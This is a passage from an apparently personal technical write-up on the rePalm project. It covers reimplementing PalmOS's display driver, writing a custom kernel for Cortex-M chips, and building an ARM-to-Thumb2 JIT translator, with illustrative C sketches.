It did! Not right away, of course, but it did. Colors were messed up, artifacts everywhere, but I saw the touchscreen calibration screen after boot! Success, yes? Well, not even remotely. To start with, it turns out that in the interest of optimization, PalmOS's drawing code happily sticks its fingers into the display driver's globals. My display "driver" at this point was just an area of memory backed by an SDL surface. It took a lot of work (throwaway work - the worst kind) to figure out what it was looking for and give it to it. But after a few more weeks, Zire72's DAL 's drawing code happily ran under rePalm and I was able to see things drawn correctly. After hooking up rudimentary fake touchscreen support, I was even able to interact with the virtual device and see the home screen. Great, but this was all a waste. I do not own that code and cannot ship it. I also cannot improve it, expand it, fix it, or even claim to entirely understand it. This was not a path forward.

Meticulously-performed imitation is also a form of flattery, no?

The time had come. I rewrote the drawing code. Function by function. Line by line. Assembly statement by assembly statement. I tested it after replacing every function, as best as I could. Along the way I gained an understanding of how PalmOS draws, what shortcuts for what common cases there are, etc. This effort took two months, after which 30,000 lines of uncommented assembly had turned into 8,000 lines of C. rePalm finally was once again purely my own code! Along the way I optimized a few things and added support for one-and-a-half density, something that the Zire72 DAL never supported. Of all the parts of this project, this was the hardest to slog through, because at the end of every function decoded, understood, and rewritten, there was no noticeable movement forward - the goal was just to not break anything, and there were always dozens of thousands of lines of code left to disassemble, understand, and rewrite in C.

Virtual SD card

For testing, it would be convenient to be able to load programs into the device more easily than baking them into the ROM. I wrote a custom slot driver that did nothing but allow you to use my custom filesystem. That filesystem used hypercalls to reach code in the "runner" to perform filesystem ops on the host. Basically, this created a shared folder between my PC and rePalm. I used this to verify that most software and games worked as expected.

Which device ROM are you using?

ANY! I tested a pre-production Tungsten T image, I tested a LifeDrive image, and even a Sony TH55 ROM boots! Yes, there were custom per-device and per-OS-version tweaks, but I was able to get them to apply automatically at runtime. For example, determining which OS version is running is easily done by examining the number of exported entrypoints of Boot. And determining if the ROM is from a Sony device is easy by looking for the SonyDAL module. We then refuse to load it, and fake-export equivalent functions ourselves. Why does the DAL need to know the OS version? Some DAL entrypoints changed between PalmOS 5.0 and PalmOS 5.2, and PalmOS 5.4 and later expect a few extra behaviours out of existing funcs that we need to support.

So you're done, right? It works?

At this point, rePalm sort of worked. It was a window on my desktop that ran REAL UNMODIFIED PalmOS with only a single file in the ROM replaced - the DAL . Time to call it done, and pick a new project, right? Well, not quite. Like I said, Linux was not an ideal kernel for this, and making a slightly-more-open PalmOS simulator was not my goal. I wanted to make a device...

Towards the first pirate PalmOS device

A little bit about normal PalmOS 5.x devices, their CPUs, and the progress since...

In order to understand the difficulties I faced, it is necessary to explain some more about how PalmOS 5.x devices usually worked. PalmOS 5.x targeted ARMv4T or ARMv5 CPUs. They had 4-32MB of flash or ROM to contain the ROM, and 8-128MB of RAM for runtime allocations and data storage. PalmOS 5.4 added NVFS, which I shall for now pretend does not exist (as we all wished we could when NVFS first came out). ARMv4T and ARMv5 CPUs implement two separate instruction sets: ARM and Thumb. ARM instructions are each exactly 4 bytes, and are the original instruction set for ARM CPUs. Thumb was added in v4T as a method of improving code density. It is a set of 2-byte long instructions that implement the most common operations code might want to do, and by being half the size they improve code density. Obviously, you do not get something for nothing. In the CPUs back then, Thumb instructions had one extra pipeline stage, which caused them to be slower in code with a lot of jumps. Also, as the instructions themselves were simpler, sometimes it took more of them to do the same thing. Thumb instructions, in most cases, also only have access to half as many registers as ARM instructions, further leading to slightly less optimal code. But, in general, Thumb code was smaller, and speed was not a factor, so large parts of PalmOS were compiled in Thumb mode. (Sony bucked this trend, having splurged for larger flash chips and compiled the entire OS in ARM mode.) Some things could also not be done in Thumb at all, for example a 32x32->64 bit multiply, and some were very suboptimal to do in Thumb (like a lot of the drawing code, with a lot of complex bit shifts and addressing). These speed-critical pieces were always compiled in ARM mode in PalmOS. Also, all library entry points were always in ARM mode with no other options, so even libraries entirely compiled as Thumb had small thunks from ARM to Thumb mode on each entrypoint.

How does one actually switch modes between ARM and Thumb in ARMv5? Certain, but not all, instructions that change control flow perform the change. Since all ARM instructions are 4 bytes long and always aligned on a 4-byte boundary, any valid ARM instruction's address has the low two bits cleared. Thumb instructions are 2 bytes long, and thus have the bottom bit cleared. 32-bit-long Thumb2 instructions are also aligned on a 2-byte boundary. This means that for any instruction in any mode, the lower bit of its address is always clear. ARM used this fact for mode switching. The BX instruction would now look at the bottom bit of the register you're jumping to, and if it was 1, treat the destination as Thumb, else as ARM. Any instruction that loads PC with a word will do the same: POP, LDM, LDR instructions. Arithmetic done on PC in Thumb mode never changes to ARM mode (the low bit is ignored), and arithmetic done on PC in ARM mode is undefined if the lower 2 bits produced are nonzero (CAUTION: this is one of the things that ARMv7 changed: this now has defined behaviour). Also, an extra instruction was added for easy calls between modes: BLX. There is a form of it that takes a relative offset encoded in the instruction itself, which basically acts like a BL, but also switches modes to whatever the current mode is NOT. There is also a register form of it that combines what a BX does with saving the return address. Of course, to make sure that returns to Thumb mode work as expected, the Thumb instructions that save a return address, namely BL and BLX, set the lower bit of LR.

ARMv5 at this point in time is ancient history. The ARM architecture is up to v8.x by now, with 64-bit-wide registers and a completely different instruction set. ARMv7 is still often seen around (v8 can also run in v7 mode) and is actually an almost perfect (but not entirely so) superset of ARMv5. So I could basically take a dev board for any ARMv7 chip, which are abundant and cheap, and use that as my base, right? Technically yes, but I did not go this way. To start with, few of these CPUs are documented well, so unless you use the Linux kernel, you'll never get them up - writing your own kernel and drivers for them is not feasible (I am looking at you, Allwinner). "But," you might object, "what about the Raspberry Pi, isn't its CPU fully documented?" I considered it, but discarded the idea - the RasPi is terribly unstable, and I had no desire to build on such a shaky platform. Launch firefox on your RasPi, open dailymail or some other complex site, and go away, come back in 2 weeks; I guarantee you'll be greeted by a hung screen and a kernel panic on the serial console. If even the Linux kernel developers cannot make this thing work stably, I had no desire to try. No thanks. So what then?

ARMv7M

The other option was to use a microcontroller - they are plentiful, documented, cheap, and available. ARM designs and sells a large number of small cores under the Cortex brand. Cortex-M0/M0+/M1 are cores based on the ARMv6M spec - basically they run the same Thumb instruction set that ARMv5 CPUs did, with a few extra instructions to allow them to manage privileged state (MRS / MSR / CPS). Cortex-M23 is their successor, which adds a few extra instructions (DIV / CBZ / CBNZ / MOVW / MOVT / B.W) which make it a bit less of a pain in the ass, but it still is very much a pain for complex work. Cortex-M3/M4/M7 implement the ARMv7M spec, which has a much-expanded Thumb2 instruction set. It is the same instruction set that ARM introduced into the ARM cores back in the day with ARMv6T2 architecture CPUs. These instructions are a mix of 2- and 4-byte long pieces and are actually pretty good for complex code, supporting long multiplies, complex control flow, and bitfield operations. They can also address all registers, and not just half of them like the Thumb instruction set of yore. Cortex-M33 is the successor to these, adding a few more things we do not currently care about. Optionally, these cores can also include an FPU for hardware floating point support. We also do not care about that. There is only one problem: None of these CPUs support ARM instructions. They all only run Thumb/Thumb2. This means we can run most of PalmOS's Boot and UI, but many other things will fail. Not acceptable. Well, actually, since every library has to be entered in ARM mode, nothing will run...

My kingdom for an ARM!

It is at this point that I decided to extend PalmOS's module format to support direct entry into Thumb mode, and converted my DAL to this new format. I also taught my module loader to understand when a library's entry point points to a simple ARM-to-Thumb thunk, and to resolve this directly. This allowed an almost complete boot without needing ARM. But this was not a solution. Large parts of the OS were still in ARM mode (things like MemMove, MemCmp, division routines), and if the goal was to run an unmodified OS and apps, editing everything everywhere was not an option. Some things we could just patch via SysPatchEntry. This I did to the abovementioned MemMove and MemCmp for speed, providing optimal Thumb2 implementations. Other things I could do nothing about - things like integer division (which ARMv5 has no instruction for) were scattered in almost every library, and could not be patched away as they were not exported. We really did need something that ran ARM instructions.

But what if we try?

What exactly will happen if we try to switch an ARMv7M microcontroller into ARM mode? The manual luckily is very clear on that. It WILL switch, clear the status bit that indicates we're in Thumb mode, and then, when it tries to execute the next instruction, it will take a UsageFault since it cannot execute in this mode. The Thumb BLX instruction of the form that always switches modes is undefined in ARMv7M, and if executed, the CPU will take a UsageFault as well, indicating an invalid instruction. This all sounds grim, but it is actually fantastic news! We can catch a UsageFault ... If you see where I am going with this, and are appropriately horrified, thanks for paying attention! We'll come back to this story arc later, to give everyone a chance to catch up.

We need hardware, but developing on hardware is ... hard

CortexEmu to the rescue

I thought I could make this all work on a Cortex-M class chip, but I did not want to develop on one - too slow and painful. I also did not find any good emulators for Cortex-M class chips. At this point, I took a two-week-long break from this project to write CortexEmu. It is a fully functional Cortex-M0/M3/M23 emulator that faithfully emulates real Cortex hardware. It has a GDB stub so I can attach GDB to it to debug the running code. It has rudimentary emulated hardware to show a screen, and supports an RTC, a console, and a touchscreen. It supports privileged and unprivileged modes, and emulates the memory protection unit (MPU) as well. CortexEmu remains the best way to develop rePalm.

Waaaah! You promised real hardware

Yes, yes, we'll get to that, and a lot more later, but that is still months later in the story, so be patient!

Um, but now we need a kernel...

Need a kernel? Why not Linux?

PalmOS needs a kernel with a particular set of primitives. We already discussed some (but definitely not all) reasons why Linux is a terrible choice. Add to that the fact that Cortex-M3 compatible Linux is slow AND huge, and it was simply not an option. So, what is?

I ended up writing my own kernel. It is simple, and works well. It will run on any Cortex-M class CPU, and supports multithreading with priorities, precise timers, mutexes, semaphores, event groups, mailboxes, and all the primitives PalmOS wants, like the ability to force-pause threads and the ability to disable task switching. It also takes advantage of the MPU to add some basic safety like stack guards. Also, there is great (& fast) support for thread local storage, which comes in handy later. Why write my own kernel, aren't there enough out there? None of the ones out there really had the primitives I needed, and bolting them on would take just as long.

So, uh, what about all that pesky ARM code?

The ARM code still was a problem

PalmOS still would not boot all the way to UI because of the ARM code. But, if you remember, a few paragraphs ago I pointed out that we can trap attempts to get into ARM mode. I wrote a UsageFault handler that did that, and then... I emulated it.

You do not mean...?

Oh, but I do. I wrote an ARM emulator that would read each instruction and execute it, until the code exited ARM mode, at which point I'd exit the emulation and resume native execution. The actual details of how this works are interesting, since the emulator needs its own stack and cannot run on the stack of the emulated code. There also needs to be a place to stash the emulated registers, since we cannot just keep them in the real registers (not enough registers for both). Exiting emulation is also kind of fun, since you need to load ALL the registers, as well as the status register, all at once, atomically. Not actually trivial on Cortex-M. Well, in any case, "emu.c" and "emuC.c" have the code - go wild and explore.

But isn't writing an emulator in C kind of slow?

You have no idea! The emulator was slow. I instrumented CortexEmu to count cycles, and came up with an average of 170 cycles of host CPU to emulate a single ARM instruction. Not good enough. Not even remotely. It is well known that emulators written in C are slow. C compilers kind of suck at optimizing emulator code. So what next? Well, I went ahead and rewrote the emulator core in assembly. Actually, I did it twice. Once for ARMv7M (Cortex-M3 target) and once for ARMv6M (Cortex-M0 target). The speed improved a lot. Now for the M3 core I was averaging 14 host cycles per emulated instruction, and for the M0 it was 19. A very respectable emulator performance, if I do say so myself.

So, is it fast enough now?

As mentioned before, on original PalmOS devices, ARM code was generally faster than Thumb, so most of the hottest, tightest, fastest code was written in ARM. For us, ARM is 14x slower than Thumb. So the code that was meant to be fastest is slow. But let us take an inventory of this code and see what it really is. Division routines are part of it. ARMv7M implements division in hardware, but ARMv5 did not (nor does ARMv6M). These routines are a hundred cycles or so in ARM mode. MemMove, MemSet, and MemCmp we spoke about already, and we do not care because we replaced them, but lots of libraries had their own internal copies we cannot replace. My guess is that the compiler prefers to inline its own "memset" and "memcpy" in most cases. That made up a large part of the boot process's ARM code usage. Luckily, all of these functions are the same everywhere...

So, can we pattern-match some of these in the emulator code and execute faster native routines? I did this, and the boot process did go faster. The average per-instr overhead rose due to the matching, but boot time shrank. Cool. But what happens after boot? After boot, we meet the real monster... PACE's m68k emulator is written in ARM. 60 kilobytes of what is clearly hand-written assembly with lots of clever tricks. Clever tricks suck when you're stuck emulating them... So this means that every single m68k application (which is most of them) is now running under double emulation. Gross... Oh, also: slow. Something had to be done. I considered rewriting PACE, but that is a poor solution - there are a lot of ARM libraries and I cannot rewrite them all. Plus, in what way could I claim to be running an unmodified OS if I replaced every bit of it?
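The pattern-matching mentioned at the top of this section boils down to something like this sketch (the shapes and names are mine): compare the words at the requested ARM entry point against fingerprints of known routines, and on a hit run a native Thumb2 replacement instead of emulating.

    #include <stdbool.h>
    #include <stdint.h>
    #include <string.h>

    struct KnownRoutine {
        const uint32_t *opcodes;                 /* exact ARM words to match */
        unsigned nWords;
        void (*native)(uint32_t *regs);          /* fast Thumb2 replacement */
    };

    static bool tryFastPath(const struct KnownRoutine *tbl, unsigned n,
                            const uint32_t *entry, uint32_t *regs)
    {
        unsigned i;

        for (i = 0; i < n; i++) {
            if (!memcmp(entry, tbl[i].opcodes, tbl[i].nWords * 4)) {
                tbl[i].native(regs);             /* skip emulation entirely */
                return true;
            }
        }
        return false;
    }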

There is one more way to make non-native code fast...

You do not mean...? (pt2)

Just in time: this

PACE contains a lot of hot code that is static. On real devices it lives in ROM and does not change. Most libraries are the same. So, what can we do to make it run faster? Translate it to what we can run natively, of course. Most people would not take on the task of writing a just-in-time translator alone. But that is just because they are wimps :) (Or maybe they reasonably assume that it is a huge time sink with more corner cases than one could shake a stick at.)

JITs: how do we start?

Basically the same way we did for the emulator. We create a per-thread translation cache (TC) which will hold our translations. Why per thread? Because this avoids the problem of one thread flushing the cache while another is running in it with no end in sight. The TC will contain translation units (TU), each of which represents some translated code. Each TU contains its original "source" ARM address, and then just valid Thumb2 code. There will also be a hashtable which maps source "ARM" addresses to a bucket where the first TU for that hash value is stored. Each bucket is a linked list, and 4096 buckets are used. This is configurable. A fast & simple hash is used; tested on a representative sample of addresses, it gave a good distribution. Now, whenever we take a UsageFault that indicates an attempted entry into ARM mode, we look up the desired address in the hashtable. If we get a hit, we simply replace the PC in the exception frame with the "code" pointer of the matching TU and return. The CPU proceeds to execute native code quickly. Wonderful! What if we do not get a hit? We then save the state and replace the PC in the exception frame with the address of the translation code (we do not want to translate in kernel mode).
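In C, the structures just described look roughly like this (the field names and the hash are mine; the real code is fancier):

    #include <stddef.h>
    #include <stdint.h>

    #define NUM_BUCKETS 4096            /* configurable, as noted */

    struct TU {                         /* one translation unit */
        struct TU *next;                /* next TU in this hash bucket */
        uint32_t srcAddr;               /* original "source" ARM address */
        uint16_t code[];                /* valid Thumb2 code to jump to */
    };

    struct TC {                         /* one per-thread translation cache */
        struct TU *buckets[NUM_BUCKETS];
    };

    static uint32_t hashAddr(uint32_t addr)     /* illustrative hash only */
    {
        return (addr ^ (addr >> 13)) & (NUM_BUCKETS - 1);
    }

    static const uint16_t *tcLookup(const struct TC *tc, uint32_t srcAddr)
    {
        const struct TU *tu = tc->buckets[hashAddr(srcAddr)];

        while (tu && tu->srcAddr != srcAddr)
            tu = tu->next;
        return tu ? tu->code : NULL;    /* NULL: go translate */
    }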

Parlez-vous ARM?

The front end of a JIT basically just needs to ingest ARM instructions and understand them. We'll trap on any we do not understand, and try to translate all those that we do. Here we hit our first snag. Some games use instructions that are not valid. Bejeweled, I am looking at you! The game "Bejeweled" has some ARM code included in it, and it likes to return by executing LDMDB R11, {R0-R12, SP, PC}^ . Ignoring the fact that R0-R2 and R12 do not need to be saved and they are being inefficient, that is also not a valid instruction to execute in user mode at all. That little caret at the end means "also transfer SPSR to CPSR". That request is invalid in user mode, and the ARM architecture reference manual is very clear that executing this in user mode will have undefined effects. This explains why Bejeweled did not run under rePalm under QEMU. QEMU correctly refused to execute this insanity. Well, I dragged a Palm device out of a drawer and tested to see what actually happens if you execute this. Turns out that it is just ignored. Well, I guess my JIT will do that too. My emulator cores had no trouble with this instr: since this instr is undefined in user mode, treating it as if it had no caret was safe, and thus they never even checked the bit that indicated it.

Luckily for us, ARM only has a few instruction formats. Unluckily for us, they are all pretty complex. Luckily, decoding is easy. Almost every ARM instruction is conditional, and the top 4 bits determine if it executes at all or not. Data Processing operations are always 3-operand: a destination reg, a source reg, and an "Operand", which is ARM's addressing mode 1. It can be an immediate of certain forms, a register, a register shifted by an immediate, or a register shifted by a register. Say what?! Yup, you can do things like ADD R0, R1, R2, ROR R3 . Be scared. Be very scared! Setting flags is optional. Loading/storing bytes or words uses addressing mode 2, which allows the use of a register plus/minus an immediate, or a register plus/minus a register, or a register plus/minus a register shifted by an immediate. All of these modes can be indexed, postindexed, or indexed-with-writeback, so scary things like LDR R0, [R1], R2, LSL #12 can be concocted. Loading/storing halfwords or signed data uses addressing mode 3, which is just like mode 2 except no register shifts are available. This mode is also used for the LDRD and STRD instructions that some ARMv5 cores implement (this is part of the optional DSP extension). Addressing mode 4 is used for LDM and STM instructions, which are terrifying in their complexity and number of corner cases. They can load or store any subset of registers to a given base address with pre-or-post increment-or-decrement and optional writeback. They are used for stack ops. And last, but not least, there are branches, which are all encoded simply and decode easily. Phew...
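Picking apart the fixed fields of a data-processing instruction, for instance, is mechanical (the field positions are architectural; the struct is my own):

    #include <stdint.h>

    struct DpInstr {
        uint8_t cond;       /* bits 31..28: 0xE means "always" */
        uint8_t opcode;     /* bits 24..21: AND, SUB, ADD, MOV, ... */
        uint8_t setFlags;   /* bit 20: the "S" suffix */
        uint8_t rn, rd;     /* bits 19..16 and 15..12 */
        uint16_t op2;       /* bits 11..0: addressing mode 1 - an immediate
                             * with rotation, a register, a register shifted
                             * by an immediate, or a register shifted by a
                             * register (the scary case); bit 25 (not
                             * captured here) selects the immediate form */
    };

    static struct DpInstr decodeDp(uint32_t instr)
    {
        struct DpInstr d;

        d.cond = instr >> 28;
        d.opcode = (instr >> 21) & 0xf;
        d.setFlags = (instr >> 20) & 1;
        d.rn = (instr >> 16) & 0xf;
        d.rd = (instr >> 12) & 0xf;
        d.op2 = instr & 0xfff;
        return d;
    }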

2 Thumbs do not make an ARM

Initially, the thought was that the translation could not be all that hard. The instructions look similar, and it shouldn't be all that bad. Then reality hit. Hard. Thumb2 has a lot of restrictions on operands; for example, SP cannot at all be treated like a general register, and LR and PC cannot ever be loaded together. It also lacks anything equalling addressing mode 1's ability to shift a register by a register as a third operand to an ALU operation. It lacks the ability to shift a third register by more than 3, like mode 2 can in ARM. I am not even going to talk about LDM and STM ! Oh, and then there is the issue of not letting the translated code know it is being translated. This means that it must still think it is running from its original place, and if it reads itself, see ARM instructions. This means that we cannot ever leak PC's real value into any executable state. The practical upshot of that is that we can never emit a BL instruction, and whenever PC is read, we must instead produce an immediate value which is equal to what PC would have been had the actual ARM code run from its actual place in memory. Not fun...

Thumb2's LDM / STM actually lack half the modes that ARM has (modes IB and DA ), so we'd have to expand those instructions into a lot more code. Oh, and Thumb2 has limits on writeback that do not match ARM's (they are more strict), and also you can never use SP in the register set, nor can you ever store PC this way in Thumb2. At this point it becomes abundantly clear that this will not be an easy instruction-in -> instruction-out job. We'll need places to store temporary immediates, we'll need to rewrite lots of instructions, and we'll need to do it all without causing side effects. Oh, and it should be fast too!

A JIT's job is never over

LDM and STM, may they burn in hell forever!

How LDM/STM work in ARM

ARM has two multiple-register ops: LDM and STM . Each has a few addressing modes. First is the order: up or down in addresses (that is, does the base register address the spot for the lowest-numbered register or the highest). Next is whether the base register's address itself is to be used, or whether it should be incremented/decremented first. This gives us the four basic modes: IA ("increment after"), IB ("increment before"), DA ("decrement after"), DB ("decrement before"). Besides that, it is optional to write the updated base address back to the base register. There are of course corner cases, like what value gets stored if the base register is itself stored with writeback on, or what value the base register will have if it is loaded while writeback is also specified. The ARM spec explicitly defines some of these cases as having unpredictable consequences.
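
To make the four modes concrete, here is a minimal sketch of the addresses involved, following the ARM Architecture Reference Manual's rules (the function and names are my illustration):

#include <stdbool.h>
#include <stdint.h>

// Sketch: lowest address accessed, and the writeback value, for an
// LDM/STM with numRegs registers in the list. With base = 0x1000 and a
// two-register list: IA touches 0x1000/0x1004, IB 0x1004/0x1008,
// DA 0x0FFC/0x1000, and DB 0x0FF8/0x0FFC.
static void ldmStmAddrs(uint32_t base, uint32_t numRegs, bool up,
                        bool before, uint32_t *lowest, uint32_t *wbVal)
{
    uint32_t bytes = numRegs * 4;

    if (up) {                               // IA / IB
        *lowest = before ? base + 4 : base;
        *wbVal = base + bytes;
    } else {                                // DA / DB
        *lowest = before ? base - bytes : base - bytes + 4;
        *wbVal = base - bytes;
    }
}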

For the stack, ARM uses a full-descending stack. That means that at any point, the SP register points to the last ALREADY USED stack position. So, to pop a value, you load it from [SP] , and then increment SP by 4. This would be done using an LDM instruction with the IA addressing mode. To push a value onto the stack, one should first decrement SP by 4, and then store the desired value at [SP] . This corresponds to an STM instruction with the DB addressing mode. The IB and DA modes are not used for the stack in normal ARM code.

How LDM/STM work in Thumb2

So why did I tell you all this? Well, while designing the Thumb2 instruction set, ARM decided what to support and what not to. This basically meant that uncommon things did not get carried forward. Yup... you see where this is going. Thumb2 does not support the IB and DA modes. At all. Not cool. But there is more. Thumb2 forbids using the PC or SP registers in the list of registers to be stored by STM . Thumb2 also forbids ever loading SP using LDM . Also, if an LDM loads PC , it may not also load LR , and if it loads LR , it may not also load PC . There is more yet: PC is not allowed as the base register, and the register list must be at least two registers long. This is a somewhat-complete list of what Thumb2 is missing compared to ARM.

But wait, there is more. Even the instructions that map nicely from ARM to Thumb2 and comply with all the restrictions of Thumb2 are not that simple to translate. For example, storing PC is, as always, hard - we need a spare register to hold the expected PC value so we can push it. But registers are pushed in order, so depending on what register we pick as our temporary reg, it might be out of order relative to the others, and we might need to split the store into a few stores. But there is more yet. What if the store was to SP or included SP ? We changed SP by pushing our temp reg, so we need to adjust for that. But what if this was an STMDB SP! (aka: PUSH )? Then we cannot pre-push a temp register that easily...

But wait, there's more ... pain

There is another complication. LDM / STM is expected to act as an atomic instruction to userspace. It is either aborted or resumable at the system level. But in Thumb2 on Cortex-M chips, SP is special, since the exception frame gets stored there. This means that SP must always be valid, and any data stored BELOW SP is not guaranteed to ever persist (since an interrupt may happen anytime). Luckily, storing data below SP was discouraged on ARM too, and this was rarely done. There is one common piece of PalmOS code that does this: the code around SysLinkerStub that is used to lazy-load libraries. For other reasons, rePalm replaced this code anyway. In all other cases the JIT will emit a warning if an attempt is made to load/store below SP .

As you see, this is very, very, very complex. In fact, the complete code to translate LDM / STM ended up being just over four thousand lines long, and the worst-case translation can be 60-ish bytes. Luckily this is only for very weird instructions, the likes of which I have never seen in real code. "So," you might ask, "how could this be tested if no code uses it?" I actually used a modified version of my uARM emulator to emulate both original code and translated code to verify that each destination address is loaded/stored exactly once and with proper values only, and then made a test program that would generate a lot of random valid LDM / STM instructions. It was then left to run for a few weeks. All bugs were exterminated with extreme prejudice, and I am now satisfied that it works. So here is how the JIT handles it, in general; a condensed sketch in C follows the list (look in "emuJit.c" for the real details).

Translating LDM/STM

  1. Check if the instruction triggers any undefined behaviour, or is otherwise not defined to act in a particular way as per the ARM Architecture Reference Manual. If so, log an error and bail out.
  2. Check if it can be emitted as a Thumb2 LDM / STM , that is: does it comply with ALL the restrictions Thumb2 imposes? If so, and also if PC is not being stored, emit a Thumb2 LDM / STM .
  3. Check if it can be emitted as a LDR / STR / LDRD / STRD while complying with Thumb2 limits on those. If so, that is emitted.
  4. A few special fast cases to emit translations for common cases that are not covered by the above (for example ADS liked to use STMIB for storing function parameters to stack)
  5. For unsupported modes IB and DA , if no writeback is used, they can be rewritten in terms of the supported modes.
  6. If the instruction loads SP , it is impossible to emit a valid translation due to how ARMv7-M uses SP . For this one special case, the JIT emits a special undefined instruction and we trap it and emulate it. Luckily no common code uses this ever!
  7. Finally, the generic slow path is taken:
    1. Generate a list of registers to be loaded/stored, and at what addresses.
    2. Calculate writeback if needed.
    3. If needed, allocate a temporary register or two (we need two if storing PC and SP) and spill their contents to stack
    4. For all registers left to be loaded/stored, see how many we can load/store at once, and do so. This involves emitting a set of instructions: LDR / STR / LDRD / STRD / LDM / STM until all is done.
    5. If we had allocated temporary registers, restore them
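
Condensed into code, the ladder above looks roughly like this (a sketch with hypothetical helper names; the real logic is in "emuJit.c"):

// Sketch of the LDM/STM translation ladder; every helper here is
// illustrative shorthand for the numbered steps above.
static bool jitTranslateLdmStm(struct JitCtx *jit, uint32_t instr)
{
    if (isUnpredictable(instr))               // step 1: log and bail
        return reportBadInstr(jit, instr);

    if (fitsThumb2LdmStm(instr))              // step 2
        return emitThumb2LdmStm(jit, instr);

    if (fitsSingleTransfer(instr))            // step 3: LDR/STR/LDRD/STRD
        return emitSingleTransfer(jit, instr);

    if (emitFastSpecialCase(jit, instr))      // step 4: e.g. ADS's STMIB
        return true;

    if (rewriteIbDaWithoutWriteback(&instr))  // step 5
        return emitThumb2LdmStm(jit, instr);

    if (instrLoadsSp(instr))                  // step 6: trap and emulate
        return emitUndefinedTrap(jit, instr);

    return emitGenericSlowPath(jit, instr);   // step 7
}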

Slightly less hellish instructions

Addressing mode 1 was hard as well. Basically, thanks to those shift-by-register modes, we need a temporary register to calculate that value so we can then use it. If the destination register is not used as a source, we can use that as temp storage, since it is about to be overwritten by the result anyway... unless it is also one of the other source operands... or SP ... or PC ... oh god, this is becoming a mess. Now what if PC is also an operand? We need a temporary register to load the "fake" PC value into before we can operate on it. But once again we have no temporary registers. This got messy very quickly. Feel free to look in "emuJit.c" for details. Long story short: we do our best to not spill things to stack, but sometimes we do have to.

The same applies to some complex addressing modes. Thumb2 optimized its instructions for common cases, which makes uncommon cases very hard to translate. Here it is even harder to find temporary registers, because if we push anything, we might need to account for that if our base register is SP . Once again: long story, scary story, see "emuJit.c". Basically: common things get translated efficiently, uncommon ones do not. A special case is PC-based loads. These are used to load constant data. In most cases we inline the constant data into the produced translations for speed.

Conditional instructions

Thumb2 does have a way to make instructions conditional: the IT instruction, which makes the next 1-4 instructions conditional. I chose not to use it because it also changes how flags get set by 2-byte Thumb instructions, and I did not want to special-case that. Also, sometimes 4 instructions are not enough for a translation. E.g., some STMDA instructions expand to 28 instructions or so. Instead, I just emit a branch of the opposite polarity (condition) over the translation. This works since such branches are also just 2 bytes long for all possible translation lengths.
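
A minimal sketch of that trick (the encoding math follows the Thumb B<cond> T1 format; the function itself is my illustration):

#include <stdint.h>

// Sketch: encode a 16-bit Thumb conditional branch that skips over a
// translation of 'translationBytes' bytes placed right after it. ARM
// condition codes invert by flipping their low bit (EQ<->NE, etc.),
// and B<cond> (T1) is 0xD000 | cond << 8 | imm8, where the target is
// branchAddr + 4 + imm8 * 2.
static uint16_t makeSkipBranch(uint8_t armCond, uint32_t translationBytes)
{
    uint8_t invCond = armCond ^ 1;             // opposite polarity
    uint32_t imm8 = translationBytes / 2 - 1;  // lands just past the end

    return 0xD000 | ((uint16_t)invCond << 8) | (imm8 & 0xFF);
}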

Jumps & Calls

This is where it gets interesting. Basically, there are two types of jumps/calls: those whose destinations are known at translation time, and those whose destinations are not. Those whose addresses are known at translation time are pretty simple to handle. We look up the destination address in our TC. If it is found, we literally emit a direct jump to that TU. This makes hot loops fast - no exit from translated code is needed. Indirect or computed jumps are not common, so one would think that they are not that important. This is wrong, because there is one type of such jump that happens a lot: function return. We do not know, at translation time, where the return is going to go. So how do we handle it? Well, if the code directly loads PC , everything will work as expected. Either it will be an ARM address and our UsageFault handler will do its thing, or it will be a Thumb address and our CPU will jump to it directly. An optimization exists in case an actual BX LR instruction is seen. We then emit a direct jump to a function that looks up LR in the hash - this saves us the time needed to take an exception and return from it (~60 cycles). Obviously more optimizations are possible, and more will be added, but for now, this is how it is. So what do we do for a jump whose destination is known but we haven't yet translated it? We leave ourselves a marker, namely an instruction we know is undefined, and we follow that up with the target address. This way, if the jump is ever actually taken (not all are), we'll take the fault, translate, and then replace that undefined instr and the word following it with an actual jump. The next time, that jump will be fast, taking no faults.
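
Sketched out, the marker trick looks like this (hypothetical emitter names; the real fault-side patching lives with the JIT's fault handlers):

// Sketch: emit a lazy jump to ARM code at 'armTarget' that has not been
// translated yet. JIT_MARKER_UDF stands in for an opcode that is
// permanently undefined in Thumb2; emit16/emit32 are hypothetical.
static void emitLazyJump(struct JitCtx *jit, uint32_t armTarget)
{
    emit16(jit, JIT_MARKER_UDF);  // faults on first execution
    emit32(jit, armTarget);       // the fault handler reads this...
}
// ...translates armTarget if needed, then overwrites both words with a
// direct B.W to the translation, so later runs take no fault at all.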

Translating a TU

The process is easy: translate instructions until we reach one that we decide is terminal. What is terminal? An unconditional branch is terminal. A call is too (conditional or not). Why? Because someone might return from it, and we'd rather have the return target's code be in a new TU so we can find it when the return happens. An unconditional write to PC of any sort is terminal as well. There is also a bit of cleverness for jumps to nearby places. As we translate a TU, we keep track of the last few dozen instructions we translated and where their translations ended up. This way, if we see a short jump backwards, we can literally inline a jump to that translation right in there, thus creating a wonderfully fast translation of this small loop. But what about short jumps forward? We remember those as well, and if, before we reach our terminal instr, we translate an address we remembered a past jump to from this same TU, we'll go back and replace that jump with a short one to here.
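
In code, the loop is roughly this shape (a sketch; all helper names are mine, not rePalm's):

// Sketch of the per-TU translation loop described above.
static void translateTu(struct JitCtx *jit, uint32_t armAddr)
{
    for (;;) {
        uint32_t instr = fetchArmWord(armAddr);

        noteTranslationAddr(jit, armAddr, jit->writePtr); // for back-jumps
        patchPriorJumpsTo(jit, armAddr);   // short forward-jump fixups
        translateOne(jit, armAddr, instr);

        if (isUncondBranch(instr) || isCall(instr) || writesPc(instr))
            break;                         // terminal: the TU ends here

        armAddr += 4;
    }
}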

And if the TC is full?

You might notice that I said we emit jumps between TUs. "Doesn't this mean," you might ask, "that you cannot just delete a single TU?" This is correct. Turns out that keeping track of which TUs are used a lot and which are not is too much work, and the benefits of inter-TU jumps are too big to ignore. So what do we do when the TC is full? We flush it - literally throw it all away. This also helps make sure that old translations that are no longer needed eventually do get tossed. Each thread's TC grows up to a maximum size. Some threads never run a lot of ARM and end up with small TCs. The TC of the main UI thread will basically always grow to the maximum (currently 32KB).

Growing up

